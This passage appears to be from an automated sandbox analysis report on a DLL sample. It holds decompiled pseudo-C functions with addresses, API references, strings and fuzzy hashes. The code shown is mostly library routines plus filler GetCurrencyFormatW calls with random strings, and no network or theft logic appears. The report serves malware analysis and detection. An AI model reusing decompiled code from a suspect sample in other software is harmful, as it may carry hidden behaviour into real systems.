								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10004D75(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10004D75(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10017B9D(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

0x10018436
0x10018438
0x1001843d
0x10018450
0x10018454
0x10018491
0x10018491
0x10018493
0x10018496
0x10018499
0x100184b2
0x100184b2
0x100184b5
0x100184b7
0x100184bd
0x100184be
0x100184c5
0x100184ce
0x100184ce
0x100184d1
0x100184d4
0x100184d7
0x100184da
0x10018584
0x10018584
0x10018587
0x10018598
0x1001859b
0x1001859e
0x100185a0
0x100185a6
0x100185ae
0x100185b7
0x100185b7
0x100185ba
0x100185bd
0x100185e4
0x100185e6
0x00000000
0x100185bf
0x100185bf
0x100185bf
0x100185c1
0x100185cb
0x100185d3
0x100185d8
0x100185db
0x100185dc
0x100185df
0x100185df
0x00000000
0x100185c1
0x100184e0
0x100184e0
0x100184e3
0x100184ed
0x100184f0
0x100184f2
0x100184f5
0x00000000
0x00000000
0x100184fa
0x100184fa
0x100184fd
0x1001850b
0x10018521
0x1001852f
0x10018536
0x1001853e
0x10018546
0x1001854e
0x10018551
0x10018562
0x10018566
0x10018569
0x10018569
0x1001856f
0x1001856f
0x10018571
0x10018571
0x10018577
0x1001857b
0x1001857b
0x00000000
0x100184e3
0x100184da
0x1001849e
0x1001849e
0x100184a1
0x100184a1
0x100184a3
0x100184a6
0x100184a9
0x100184aa
0x100184ad
0x100184ad
0x00000000
0x100184a1
0x10018456
0x10018458
0x1001845b
0x1001848e
0x1001848e
0x00000000
0x1001848e
0x1001845d
0x10018460
0x10018467
0x1001846d
0x10018471
0x10018472
0x10018472
0x10018477
0x1001847a
0x1001847c
0x1001847f
0x10018484
0x10018487
0x1001848d
0x00000000
0x1001847a
0x1001843f
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 10018467

Strings

(, xrefs: 10018577

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction ID: 6ae8da63e7d5010fc6edffe141db471ece515f0fbfe2aaea2c8eafc942244063
Opcode Fuzzy Hash: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction Fuzzy Hash: A6516875A00B01DFDB64CF68C9C295AB7F1FF48314B504A6EE5868BA91CB70FA80CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1001615A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E1001615A(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1001FBC4(E10034098, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1003b29c);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1001FC9C(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1001BDF4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x100388d8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x100388dc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1003b2ec);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x10044410;
					E100209E8( &_v24, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t128, _t153, _t155);
					_t132 = E100105C8(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1000E58E(_t132);
					}
					return E1001FC9C(_t90);
				}
			}

0x1001615a
0x1001615a
0x10016161
0x10016166
0x10016168
0x1001616d
0x10016171
0x10016176
0x10016180
0x10016181
0x10016186
0x10016189
0x1001618b
0x1001618c
0x10016193
0x10016308
0x10016310
0x10016199
0x100161a3
0x00000000
0x100161a5
0x100161ab
0x100161b4
0x100161bd
0x100161c4
0x100161cb
0x100161ce
0x100161d1
0x100161d4
0x100161d7
0x100161dc
0x100161e1
0x100161e4
0x00000000
0x100161e6
0x100161e6
0x100161eb
0x100161ee
0x00000000
0x100161f0
0x100161f0
0x100161f6
0x100161ff
0x1001620a
0x1001620c
0x10016212
0x10016212
0x10016215
0x10016218
0x1001622b
0x1001623d
0x10016245
0x10016257
0x1001625f
0x10016272
0x1001627a
0x1001628c
0x10016294
0x1001629a
0x100162a2
0x100162a3
0x100162a8
0x100162ad
0x100162af
0x100162af
0x100162b3
0x100162b9
0x100162bd
0x100162be
0x100162c7
0x100162cd
0x100162d2
0x100162d8
0x100162de
0x100162e1
0x100162e1
0x100162e8
0x100162ee
0x100162f1
0x100162f6
0x100162fb
0x100162fb
0x10016302
0x00000000
0x10016302
0x100161ee
0x100161e4
0x100161a3
0x10016178
0x10016178
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6

APIs

__EH_prolog3.LIBCMT ref: 10016161

Strings

@, xrefs: 100161C4

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction ID: a1e3f74af39593b6165eabf356290d244c81fe92429bd0fa7cefced01a7d7b0f
Opcode Fuzzy Hash: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction Fuzzy Hash: 3351B671A0021A9FDB04CFA8C8849EEB7F9FF48304F15456EE516EB251EB74A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100061E5(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10045580; // 0xe155dca3
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10005C93(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10005EFE(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1001FBB5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x100061ee
0x100061f5
0x100061fb
0x1000620b
0x10006213
0x1000626a
0x1000626a
0x1000626a
0x10006219
0x10006221
0x10006227
0x1000622f
0x10006230
0x10006234
0x1000623f
0x10006245
0x10006246
0x10006247
0x00000000
0x10006249
0x10006254
0x10006263
0x10006263
0x10006247
0x10006278

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000620B
PathFindExtensionA.SHLWAPI(?), ref: 10006221

Part of subcall function 10005C93: _strcpy_s.LIBCMT ref: 10005C9F

Part of subcall function 10005EFE: __EH_prolog3.LIBCMT ref: 10005F1D
Part of subcall function 10005EFE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
Part of subcall function 10005EFE: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004

Strings

%s.dll, xrefs: 10006227

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction ID: 87bbfe94c284bf79419f18a095101e7eadcc839ae2e31c05850216e2d59394d5
Opcode Fuzzy Hash: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction Fuzzy Hash: A001F972A0051C6FEB19DB74CD569EE73B9EF08740F0101A9F502E7144EA71AE048751

Uniqueness

Uniqueness Score: -1.00%

Function 100014F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100014F4(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v12 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x30;
				_v8 =  *[fs:ebx];
				return _v8;
			}

0x10001522
0x1000152b
0x10001533

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001512

Strings

xadqsavcbdfewescGADW, xrefs: 100014FF
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001506

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction ID: 41eada4d2328894fcd37416b6f2f2abe75c7e90fa58e6643f2faad819eee2c9b
Opcode Fuzzy Hash: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction Fuzzy Hash: 42E0B6B5A50208BFE705CB88DDD6FCABBB8EB09705F114055F705EB691D3B0AA508A64

Uniqueness

Uniqueness Score: -1.00%

Function 10001DE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DE9(void* __esi, intOrPtr _a4) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  !(__esi - 1) & _a4 + __esi - 0x00000001;
			}

0x10001e1f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E01

Strings

xadqsavcbdfewescGADW, xrefs: 10001DEE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DF5

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
Instruction ID: a6bb75da600a1c00fcd3d833fe1878cb6779512402ee289b34badc6351d60fc0
Opcode Fuzzy Hash: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
Instruction Fuzzy Hash: 83D09E75388202AEF619C740CD97FD5B754A755706F11800CF346EE5D1CBA651558B14

Uniqueness

Uniqueness Score: -1.00%

Function 10001DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DB6(signed int _a4, intOrPtr _a8) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  !(_a8 - 1) & _a4;
			}

0x10001de8

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001DCE

Strings

xadqsavcbdfewescGADW, xrefs: 10001DBB
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DC2

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction ID: 693cd55018ed01a535ded29b615326f2d298561c8c1b69a974d3bac9f79f4422
Opcode Fuzzy Hash: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction Fuzzy Hash: CED0C9753887017AFA09D741DE97FC6B750E795B06F019008F749EE5D1CBB890408F15

Uniqueness

Uniqueness Score: -1.00%

Function 10001E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10001E20(void* _a4, intOrPtr _a8) {
				signed int _t3;

				_t3 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				asm("sbb eax, eax");
				return _t3 *  *0x100440cc + _a8 + 1;
			}

0x10001e38
0x10001e4d
0x10001e50

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E38

Strings

xadqsavcbdfewescGADW, xrefs: 10001E25
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E2C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction ID: 3fdeccdcda24fa04b64c34d0073cfd5bdbdd3e77499752cdea2f7536024f9e24
Opcode Fuzzy Hash: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction Fuzzy Hash: 2DD0C931298311BAE2059B60CD86F86B794E756B07F01C514F345EE4D1C7B090848A25

Uniqueness

Uniqueness Score: -1.00%

Function 10003854 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003854(void* __ecx) {

				E1000EE6D(__ecx, 0x3e9, "Mundo Hola");
				return SendMessageA( *(__ecx + 0xe8), 0x143, 0, "Hola Mundo");
			}

0x10003861
0x1000387f

APIs

Part of subcall function 1000EE6D: SetDlgItemTextA.USER32 ref: 1000EE7E

SendMessageA.USER32 ref: 10003878

Strings

Mundo Hola, xrefs: 10003855
Hola Mundo, xrefs: 10003866

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ItemMessageSendText
String ID: Hola Mundo$Mundo Hola
API String ID: 77679052-617527613
Opcode ID: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction ID: 1811b1191abaef19ada81be914ca39904a3dc6a32a47f6b2494c466348ef455e
Opcode Fuzzy Hash: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction Fuzzy Hash: D2C080301403A07FF5226250FC06FCA5910CB05753F008501730D7D0D18B5139804640

Uniqueness

Uniqueness Score: -1.00%

Function 10011382 Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E10011382(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E10004E6E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10048670 == 0) {
					_t4 = E1001135E();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10048828 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10048810);
					if( *_t15 == 0) {
						_t4 = 0x10048678 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10048810);
				}
				EnterCriticalSection(0x10048678 + _t11 * 0x18);
				return _t4;
			}

0x10011382
0x10011382
0x10011382
0x10011383
0x10011387
0x1001138a
0x1001138c
0x1001138c
0x10011398
0x1001139a
0x1001139a
0x1001139f
0x100113a6
0x100113a7
0x100113a8
0x100113b7
0x100113be
0x100113c3
0x100113ca
0x100113cd
0x100113d3
0x100113d3
0x100113da
0x100113da
